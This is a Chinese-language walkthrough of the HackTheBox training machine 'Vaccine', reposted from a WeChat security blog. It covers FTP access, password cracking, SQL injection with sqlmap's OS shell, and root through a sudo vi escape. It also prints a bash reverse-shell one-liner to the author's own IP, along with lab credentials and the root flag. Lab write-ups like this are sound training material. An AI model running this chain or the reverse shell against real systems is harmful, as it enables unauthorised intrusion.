【渗透测试】hackthebox靶场之Vaccine

  • A+
所属分类:安全文章

【渗透测试】hackthebox靶场之Vaccine





0x01端口扫描


【渗透测试】hackthebox靶场之Vaccine

使用

nmap -sV -sS 10.10.10.46

执行端口扫描,并且显示版本信息和端口服务

【渗透测试】hackthebox靶场之Vaccine

发现目标主机开放了21端口FTP服务、22端口SSH服务、80端口web服务。

我们可以优先通过FTP服务登录,然后可以对web服务提供渗透线索,因为登录的凭据是上一个靶场Oopsie获取到的,用于下一个靶场的使用(疏忽忘记写了):在/root/.config/filezilla路径下的filezilla.xml配置文件,用户登录凭据是:ftpuser/[email protected]

【渗透测试】hackthebox靶场之Vaccine

我们使用ls查看当前目录下的文件,发现存在backup.zip这个类似备份的zip文件,我们get下来,解压后发现需要解压密码

【渗透测试】hackthebox靶场之Vaccine

【渗透测试】hackthebox靶场之Vaccine

可以使用kali的john,也可以在win下使用archpr去爆破压缩包密码。

【渗透测试】hackthebox靶场之Vaccine

爆破出压缩包解压密码为741852963,然后输入压缩包密码解压,发现有两个文件:index.php和style.css文件,打开index.php

【渗透测试】hackthebox靶场之Vaccine

通过代码审计可以知道,里面有一个web登录的凭证,用户名admin,密码2cb42f8734ea607eefed3b70af13bbd3是经过MD5算法进行加密,这时候可以使用在线的解密网站somd5解密,明文密码是:qwerty789

【渗透测试】hackthebox靶场之Vaccine


0x02 WEB渗透

浏览器访问10.10.10.46

【渗透测试】hackthebox靶场之Vaccine

使用账号:admin,密码qwerty789登录后台,发现有个搜索框

【渗透测试】hackthebox靶场之Vaccine

我们随便输入一个1,搜索

【渗透测试】hackthebox靶场之Vaccine

然后发现url是search=1,很快想到可以测试是否存在SQL注入漏洞

【渗透测试】hackthebox靶场之Vaccine

使用’ or 1=1 #有返回报错,可以试试使用sqlmap去注入。

在搜索框随便写内容,然后点击搜索时候使用burp抓包,右键保存文件为sql.txt

【渗透测试】hackthebox靶场之Vaccine

然后使用sql.txt去跑sqlmap

【渗透测试】hackthebox靶场之Vaccine

【渗透测试】hackthebox靶场之Vaccine

发现确实存在SQL注入漏洞,且数据库为postgresql数据库,我们继续使用-os—shell获取到shell

【渗透测试】hackthebox靶场之Vaccine

【渗透测试】hackthebox靶场之Vaccine

发现shell获取成功,使用whoami查看当前用户名

【渗透测试】hackthebox靶场之Vaccine

当前用户名是postgres,然后我们使用bash -c 反弹shell到kali

输入:

bash -c 'bash -i >& /dev/tcp/10.10.16.9/1234 0>&1'


其中10.10.16.9是自己的kali的IP,1234是反弹的端口(随意写)。然后监听1234端口

【渗透测试】hackthebox靶场之Vaccine

然后成功反弹shell,切换到当前用户根目录,ls查看,本身应该有个user.txt的。感觉靶场有问题,所以不予理会。

【渗透测试】hackthebox靶场之Vaccine


0x03提升权限

【渗透测试】hackthebox靶场之Vaccine

在var/www/html/路径下,发现有个dashboard.php文件,cat一下试试

【渗透测试】hackthebox靶场之Vaccine

通过代码审计可知有个数据库连接配置,显示用户名是postgres,密码是[email protected]!

我们现在需要把shell升级为TTY, tty命令用于显示终端机连接标准输入设备的文件名称

SHELL=/bin/bash script -q /dev/null


【渗透测试】hackthebox靶场之Vaccine

使用sudo -l查看自己当前的权限

【渗透测试】hackthebox靶场之Vaccine

发现最下面有个用户可以使用VI编辑/etc/postgresql/11/main/pg_hba.conf配置文件,利用它来获得一个根shell并访问root.txt。

sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf


【渗透测试】hackthebox靶场之Vaccine

进入vi之后打字会重叠,所以直接输入:!/bin/bash就可以了

【渗透测试】hackthebox靶场之Vaccine

进入/root目录下,查看root.txt可以获得root的flag:

dd6e058e814260bc70e9bbdef2715849

【渗透测试】hackthebox靶场之Vaccine

【渗透测试】hackthebox靶场之Vaccine

本文始发于微信公众号(暗魂攻防实验室):【渗透测试】hackthebox靶场之Vaccine

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: